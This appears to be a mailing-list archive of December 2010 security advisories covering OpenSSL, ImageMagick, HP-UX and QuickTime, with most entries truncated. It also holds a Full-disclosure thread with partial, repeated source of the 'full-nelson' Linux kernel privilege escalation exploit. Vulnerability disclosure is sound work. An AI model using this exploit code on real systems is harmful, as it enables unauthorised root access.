[USN-1029-1] OpenSSL vulnerabilities
=== Ubuntu Security Notice USN-1029-1 December 08, 2010 openssl vulnerabilities CVE-2008-7270, CVE-2010-4180 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.10 Ubuntu 10.04 LTS Ubuntu 10.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libssl0.9.8 0.9.8a-7ubuntu0.14 Ubuntu 8.04 LTS: libssl0.9.8 0.9.8g-4ubuntu3.13 Ubuntu 9.10: libssl0.9.8 0.9.8g-16ubuntu3.5 Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.5 Ubuntu 10.10: libssl0.9.8 0.9.8o-1ubuntu4.3 After a standard system update you need to reboot your computer to make all the necessary changes. Details follow: It was discovered that an old bug workaround in the SSL/TLS server code allowed an attacker to modify the stored session cache ciphersuite. This could possibly allow an attacker to downgrade the ciphersuite to a weaker one on subsequent connections. (CVE-2010-4180) It was discovered that an old bug workaround in the SSL/TLS server code allowed allowed an attacker to modify the stored session cache ciphersuite. An attacker could possibly take advantage of this to force the use of a disabled cipher. This vulnerability only affects the versions of OpenSSL in Ubuntu 6.06 LTS, Ubuntu 8.04 LTS, and Ubuntu 9.10. (CVE-2008-7270) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14.diff.gz Size/MD5:67296 3de8e480bcec0653b94001366e2f1f27 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14.dsc Size/MD5: 1465 a5f93020840f693044eb64af528fd01e http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a.orig.tar.gz Size/MD5: 3271435 1d16c727c10185e4d694f87f5e424ee1 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_amd64.udeb Size/MD5: 572012 b3792d19d5f7783929e473b6eb1e239c http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.14_amd64.deb Size/MD5: 2181644 746b74e9b6c42731ff2021c396789708 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.14_amd64.deb Size/MD5: 1696628 abe942986698bf86938312c5e344e0ba http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.14_amd64.deb Size/MD5: 880292 9d6d854dcef14c90ce24c1aa232a418a http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14_amd64.deb Size/MD5: 998466 9c51c334fd6c0b7c7b73340a01af61c8 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_i386.udeb Size/MD5: 509644 e1617d062d546f7dad2298bf6463bc3c http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.14_i386.deb Size/MD5: 2031000 6755c67294ab2ff03255a3bf7079ab26 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.14_i386.deb Size/MD5: 5195206 37fcd0cdefd012f0ea7d79d0e6a1b48f http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.14_i386.deb Size/MD5: 2660326 9083ddc71b89e4f4e95c4ca999bcedba http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14_i386.deb Size/MD5: 979408 518eaad303d089ab7dcc1b89fd019f19 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_powerpc.udeb Size/MD5: 558018 0e94d5f570a83f4b41bef642e032c256 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7ubuntu0.14_powerpc.deb Size/MD5: 2189034 6588292725cfa33c8d56a61c3d8120b1 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8-dbg_0.9.8a-7ubuntu0.14_powerpc.deb Size/MD5: 1740524 0b98e950e59c538333716ee939710150 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8a-7ubuntu0.14_powerpc.deb Size/MD5: 865778 d1e44ecc73dea8a8a11cd4d6b7c38abf http://security.ubuntu.com/ubuntu/pool/main/o/openssl/openssl_0.9.8a-7ubuntu0.14_powerpc.deb Size/MD5: 984342 a3ff875c30b6721a1d6dd59d9a6393e0 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libcrypto0.9.8-udeb_0.9.8a-7ubuntu0.14_sparc.udeb Size/MD5: 531126 7f598ce48b981eece01e0a1044bbdcc5 http://security.ubuntu.com/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8a-7u
[security bulletin] HPSBUX02611 SSRT090201 rev.1 - HP-UX Running Threaded Processes, Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c02586517 Version: 1 HPSBUX02611 SSRT090201 rev.1 - HP-UX Running Threaded Processes, Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2010-12-06 Last Updated: 2010-12-06 -- Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running threaded processes. The vulnerability could be exploited remotely to create a Denial of Service (DoS). References: CVE-2010-4108 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23 and HP-UX B.11.31 running threaded processes. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2010-4108(AV:N/AC:L/Au:S/C:N/I:N/A:C) 6.8 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided the following patches to resolve this vulnerability. The patches are available by contacting HP Support HP-UX Release / Patch ID B.11.11 (11i v1) / PHKL_39133 or subsequent B.11.23 (11i v2) / PHKL_39899 or subsequent B.11.31 (11i v3) / PHKL_40944 or subsequent MANUAL ACTIONS: No PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS HP-UX B.11.11 == OS-Core.CORE2-KRN action: install PHKL_39133 or subsequent HP-UX B.11.23 == OS-Core.CORE2-KRN action: install PHKL_39899 or subsequent HP-UX B.11.31 == OS-Core.CORE2-KRN action: install PHKL_40944 or subsequent END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 6 December 2010 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-al...@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information
iDefense Security Advisory 12.07.10: Apple QuickTime PICT Memory Corruption Vulnerability
iDefense Security Advisory 12.07.10 http://labs.idefense.com/intelligence/vulnerabilities/ Dec 07, 2010 I. BACKGROUND QuickTime is Apple's media player product used to render video and other media. The PICT file format was developed by Apple Inc. in 1984. PICT files can contain both object-oriented images and bitmaps. For more information visit http://www.apple.com/quicktime/ II. DESCRIPTION Remote exploitation of a memory corruption vulnerability in Apple Inc.'s QuickTime media player could allow attackers to execute arbitrary code in the context of the targeted user. The vulnerability specifically exists in the way specially crafted PICT image files are handled by the QuickTime PictureViewer. When processing specially crafted PICT image files, Quicktime PictureViewer uses a set value from the file to control the length of a byte swap operation. The byte swap operation is used to convert big endian data to little endian data. QuickTime fails to validate the length value properly before using it. When a length value is larger than the actual buffer size supplied, it will corrupt heap memory beyond the allocated buffer, which could lead to an exploitable condition. III. ANALYSIS Successful exploitation could allow attackers to execute arbitrary code in the context of the current user. To exploit this vulnerability, an attacker must persuade a victim into using QuickTime to open a specially crafted PICT picture file. This could be accomplished by either direct link or referenced from a website under the attacker's control. An attacker could host a Web page containing a malformed PICT file. Upon visiting the malicious Web page exploitation would occur and execution of arbitrary code would be possible. Alternatively a PICT file could be attached within an e-mail file. IV. DETECTION QuickTime Player versions prior to 7.6.9 are vulnerable. V. WORKAROUND iDefense recommends disabling the QuickTime Plugin and altering the .pct, .pic and .pict filetype associations within the registry. Disabling the plugin will prevent Web browsers from utilizing QuickTime Player to view associated media files. Removing the filetype associations within the registry will prevent QuickTime Player and Picture Viewer from opening .pct, .pic and .pict files. VI. VENDOR RESPONSE Apple Inc. has released patches which addresses this issue. For more information, consult their advisory at the following URL: http://support.apple.com/kb/HT4447 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-3800 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 03/31/2010 Initial Vendor Notification 03/31/2010 Initial Vendor Reply 12/07/2010 Coordinated Public Disclosure IX. CREDIT This vulnerability was reported to iDefense by Hossein Lotfi (s0lute). Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2010 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Re: [Full-disclosure] Linux kernel exploit
> Anyone tested this in sandbox yet? 00:37 linups:../expl/kernel > cat /etc/*release* openSUSE 11.3 (i586) VERSION = 11.3 00:37 linups:../expl/kernel > uname -r 2.6.34.4-0.1-desktop 00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test 00:37 linups:../expl/kernel > ./test [*] Failed to open file descriptors.
Re: [Full-disclosure] Linux kernel exploit
Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel 2.6.35-22-generic). Works as expected. Great job Dan. You're full of win! Regards, Ryan Sears - Original Message - From: "Cal Leeming [Simplicity Media Ltd]" To: "Dan Rosenberg" Cc: full-disclos...@lists.grok.org.uk, bugtraq@securityfocus.com Sent: Tuesday, December 7, 2010 4:06:44 PM GMT -05:00 US/Canada Eastern Subject: Re: [Full-disclosure] Linux kernel exploit Anyone tested this in sandbox yet? On 07/12/2010 20:25, Dan Rosenberg wrote: > Hi all, > > I've included here a proof-of-concept local privilege escalation exploit > for Linux. Please read the header for an explanation of what's going > on. Without further ado, I present full-nelson.c: > > Happy hacking, > Dan > > > --snip-- > > /* > * Linux Kernel<= 2.6.37 local privilege escalation > * by Dan Rosenberg > * @djrbliss on twitter > * > * Usage: > * gcc full-nelson.c -o full-nelson > * ./full-nelson > * > * This exploit leverages three vulnerabilities to get root, all of which > were > * discovered by Nelson Elhage: > * > * CVE-2010-4258 > * - > * This is the interesting one, and the reason I wrote this exploit. If a > * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL > * word will be written to a user-specified pointer when that thread exits. > * This write is done using put_user(), which ensures the provided > destination > * resides in valid userspace by invoking access_ok(). However, Nelson > * discovered that when the kernel performs an address limit override via > * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault, > * etc.), this override is not reverted before calling put_user() in the exit > * path, allowing a user to write a NULL word to an arbitrary kernel address. > * Note that this issue requires an additional vulnerability to trigger. > * > * CVE-2010-3849 > * - > * This is a NULL pointer dereference in the Econet protocol. By itself, > it's > * fairly benign as a local denial-of-service. It's a perfect candidate to > * trigger the above issue, since it's reachable via sock_no_sendpage(), > which > * subsequently calls sendmsg under KERNEL_DS. > * > * CVE-2010-3850 > * - > * I wouldn't be able to reach the NULL pointer dereference and trigger the > * OOPS if users weren't able to assign Econet addresses to arbitrary > * interfaces due to a missing capabilities check. > * > * In the interest of public safety, this exploit was specifically designed > to > * be limited: > * > * * The particular symbols I resolve are not exported on Slackware or > Debian > * * Red Hat does not support Econet by default > * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and > *Debian > * > * However, the important issue, CVE-2010-4258, affects everyone, and it > would > * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly > * more sophisticated version of this that doesn't have the roadblocks I put > in > * to prevent abuse by script kiddies. > * > * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64. > * > * NOTE: the exploit process will deadlock and stay in a zombie state after > you > * exit your root shell because the Econet thread OOPSes while holding the > * Econet mutex. It wouldn't be too hard to fix this up, but I didn't > bother. > * > * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla > */ > > #include > #include > #include > #include > #include > #include > #include > #include > #include > #include > #include > #include > > /* How many bytes should we clear in our > * function pointer to put it into userspace? */ > #ifdef __x86_64__ > #define SHIFT 24 > #define OFFSET 3 > #else > #define SHIFT 8 > #define OFFSET 1 > #endif > > /* thanks spender... */ > unsigned long get_kernel_sym(char *name) > { > FILE *f; > unsigned long addr; > char dummy; > char sname[512]; > struct utsname ver; > int ret; > int rep = 0; > int oldstyle = 0; > > f = fopen("/proc/kallsyms", "r"); > if (f == NULL) { > f = fopen("/proc/ksyms", "r"); > if (f == NULL) > goto fallback; > oldstyle = 1; > } > > repeat: > ret = 0; > while(ret != EOF) { > if (!oldstyle) > ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, > sname); > else { > ret = fscanf(f, "%p %s\n", (void **)&addr, sname); > if (ret == 2) { > char *p; > if (strstr(sname, "_O/") || strstr(sname, > "_S.")) > continue; > p = strrchr(sname, '_'); > i
Re: [Full-disclosure] Linux kernel exploit
Anyone tested this in sandbox yet? On 07/12/2010 20:25, Dan Rosenberg wrote: Hi all, I've included here a proof-of-concept local privilege escalation exploit for Linux. Please read the header for an explanation of what's going on. Without further ado, I present full-nelson.c: Happy hacking, Dan --snip-- /* * Linux Kernel<= 2.6.37 local privilege escalation * by Dan Rosenberg * @djrbliss on twitter * * Usage: * gcc full-nelson.c -o full-nelson * ./full-nelson * * This exploit leverages three vulnerabilities to get root, all of which were * discovered by Nelson Elhage: * * CVE-2010-4258 * - * This is the interesting one, and the reason I wrote this exploit. If a * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL * word will be written to a user-specified pointer when that thread exits. * This write is done using put_user(), which ensures the provided destination * resides in valid userspace by invoking access_ok(). However, Nelson * discovered that when the kernel performs an address limit override via * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault, * etc.), this override is not reverted before calling put_user() in the exit * path, allowing a user to write a NULL word to an arbitrary kernel address. * Note that this issue requires an additional vulnerability to trigger. * * CVE-2010-3849 * - * This is a NULL pointer dereference in the Econet protocol. By itself, it's * fairly benign as a local denial-of-service. It's a perfect candidate to * trigger the above issue, since it's reachable via sock_no_sendpage(), which * subsequently calls sendmsg under KERNEL_DS. * * CVE-2010-3850 * - * I wouldn't be able to reach the NULL pointer dereference and trigger the * OOPS if users weren't able to assign Econet addresses to arbitrary * interfaces due to a missing capabilities check. * * In the interest of public safety, this exploit was specifically designed to * be limited: * * * The particular symbols I resolve are not exported on Slackware or Debian * * Red Hat does not support Econet by default * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and *Debian * * However, the important issue, CVE-2010-4258, affects everyone, and it would * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly * more sophisticated version of this that doesn't have the roadblocks I put in * to prevent abuse by script kiddies. * * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64. * * NOTE: the exploit process will deadlock and stay in a zombie state after you * exit your root shell because the Econet thread OOPSes while holding the * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother. * * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla */ #include #include #include #include #include #include #include #include #include #include #include #include /* How many bytes should we clear in our * function pointer to put it into userspace? */ #ifdef __x86_64__ #define SHIFT 24 #define OFFSET 3 #else #define SHIFT 8 #define OFFSET 1 #endif /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) goto fallback; oldstyle = 1; } repeat: ret = 0; while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p> ((char *)sname + 5)&& !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p> (char *)sname&& *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "
Secunia Research: QuickTime Track Dimensions Buffer Overflow Vulnerability
== Secunia Research 08/12/2010 - QuickTime Track Dimensions Buffer Overflow Vulnerability - == Table of Contents Affected Software1 Severity.2 Vendor's Description of Software.3 Description of Vulnerability.4 Solution.5 Time Table...6 Credits..7 References...8 About Secunia9 Verification10 == 1) Affected Software * Apple QuickTime 7.6.6 and 7.6.8 NOTE: Other versions may also be affected. == 2) Severity Rating: Highly critical Impact: System compromise Where: Remote == 3) Vendor's Description of Software "When you hop aboard QuickTime 7 Player, youre assured of a truly rich multimedia experience.". Product Link: http://www.apple.com/quicktime/player/ == 4) Description of Vulnerability Secunia Research has discovered a vulnerability in QuickTime, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused by a boundary error when copying track content based on the track's dimensions and can be exploited to cause a heap-based buffer overflow. Successful exploitation may allow execution of arbitrary code. == 5) Solution Update to version 7.6.9 == 6) Time Table 04/05/2010 - Vendor notified. 05/05/2010 - Vendor response. 12/10/2010 - Vendor provides status update. 08/12/2010 - Public disclosure. == 7) Credits Discovered by Carsten Eiram, Secunia Research. == 8) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2010-1508 for the vulnerability. == 9) About Secunia Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration: http://secunia.com/advisories/business_solutions/ Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security. http://secunia.com/advisories/ Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general: http://secunia.com/secunia_research/ Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions: http://secunia.com/corporate/jobs/ Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/advisories/mailing_lists/ == 10) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2010-72/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Linux kernel exploit
Hi all, I've included here a proof-of-concept local privilege escalation exploit for Linux. Please read the header for an explanation of what's going on. Without further ado, I present full-nelson.c: Happy hacking, Dan --snip-- /* * Linux Kernel <= 2.6.37 local privilege escalation * by Dan Rosenberg * @djrbliss on twitter * * Usage: * gcc full-nelson.c -o full-nelson * ./full-nelson * * This exploit leverages three vulnerabilities to get root, all of which were * discovered by Nelson Elhage: * * CVE-2010-4258 * - * This is the interesting one, and the reason I wrote this exploit. If a * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL * word will be written to a user-specified pointer when that thread exits. * This write is done using put_user(), which ensures the provided destination * resides in valid userspace by invoking access_ok(). However, Nelson * discovered that when the kernel performs an address limit override via * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault, * etc.), this override is not reverted before calling put_user() in the exit * path, allowing a user to write a NULL word to an arbitrary kernel address. * Note that this issue requires an additional vulnerability to trigger. * * CVE-2010-3849 * - * This is a NULL pointer dereference in the Econet protocol. By itself, it's * fairly benign as a local denial-of-service. It's a perfect candidate to * trigger the above issue, since it's reachable via sock_no_sendpage(), which * subsequently calls sendmsg under KERNEL_DS. * * CVE-2010-3850 * - * I wouldn't be able to reach the NULL pointer dereference and trigger the * OOPS if users weren't able to assign Econet addresses to arbitrary * interfaces due to a missing capabilities check. * * In the interest of public safety, this exploit was specifically designed to * be limited: * * * The particular symbols I resolve are not exported on Slackware or Debian * * Red Hat does not support Econet by default * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and *Debian * * However, the important issue, CVE-2010-4258, affects everyone, and it would * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly * more sophisticated version of this that doesn't have the roadblocks I put in * to prevent abuse by script kiddies. * * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64. * * NOTE: the exploit process will deadlock and stay in a zombie state after you * exit your root shell because the Econet thread OOPSes while holding the * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother. * * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla */ #include #include #include #include #include #include #include #include #include #include #include #include /* How many bytes should we clear in our * function pointer to put it into userspace? */ #ifdef __x86_64__ #define SHIFT 24 #define OFFSET 3 #else #define SHIFT 8 #define OFFSET 1 #endif /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) goto fallback; oldstyle = 1; } repeat: ret = 0; while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : ""); fclose(f); return addr; } } fclose(f);
[USN-1028-1] ImageMagick vulnerability
=== Ubuntu Security Notice USN-1028-1 December 07, 2010 imagemagick vulnerability CVE-2010-4167 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 9.10 Ubuntu 10.04 LTS Ubuntu 10.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: imagemagick 7:6.3.7.9.dfsg1-2ubuntu1.2 Ubuntu 9.10: imagemagick 7:6.5.1.0-1.1ubuntu3.1 Ubuntu 10.04 LTS: imagemagick 7:6.5.7.8-1ubuntu1.1 Ubuntu 10.10: imagemagick 7:6.6.2.6-1ubuntu1.1 In general, a standard system update will make all the necessary changes. Details follow: It was discovered that ImageMagick would search for configuration files in the current directory. If a user were tricked into opening or processing an image in an arbitrary directory, a local attacker could execute arbitrary code with the user's privileges. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2.diff.gz Size/MD5: 148538 d0cce9adb56ecc3678a3f624ae4b61a8 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2.dsc Size/MD5: 2002 ce7176e40236686799c83220863be81b http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1.orig.tar.gz Size/MD5: 8314133 6aedd4a612531ad35b38fb9386f17122 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 1436188 ad5e6a839913506650ae9c7d3f9e24bd http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++10_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 168876 99268ef73e6f25b3f687283d7ef92f27 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 225966 97a0dd82dae7286cf412b1d750645d31 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick10_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 4223226 8f95fa4cee6634672af6a1425593624f http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 1298366 6fd8fa85987e15c5908f801fe20edaa9 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 176812 5c481bdd3bc77b3adf34a4c2ca0bb0c4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 1429790 627ff519d970da5963b736d4d7fbbbae http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++10_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 173816 70d728448f29e68a2340e6a9af7bbbea http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 209622 24cab5c3f87dcafb4d249a2dacecc8b6 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick10_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 4019304 98323a0c914e381a0e0bc8068b9997c1 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 1212736 f6275b43bd2ecc4c629057032bcce788 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 173490 a1a50335c07d3cd4da0e164a77b786ec lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 1421674 4ea7f22d519d1073667a36c82843316a http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick++10_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 170594 d6112fb2191fe51be397e0ce54f84d62 http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick++9-dev_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 212186 d079bcfe815abe5998bb8d40fa6587ef http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick10_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 4057610 c53e03fcd2bfd4353832edd729717ceb http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick9-dev_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 1218594 3d83c5a0aad2a4f5ef33b716f0366d1d http://ports.ubuntu.com/pool/universe/i/imagemagick/perlmagick_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb Size/MD5: 174990 a925be46501da63050d875561d603b5c powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ub
www.eVuln.com : HTTP Response Splitting in WWWThreads (php version)
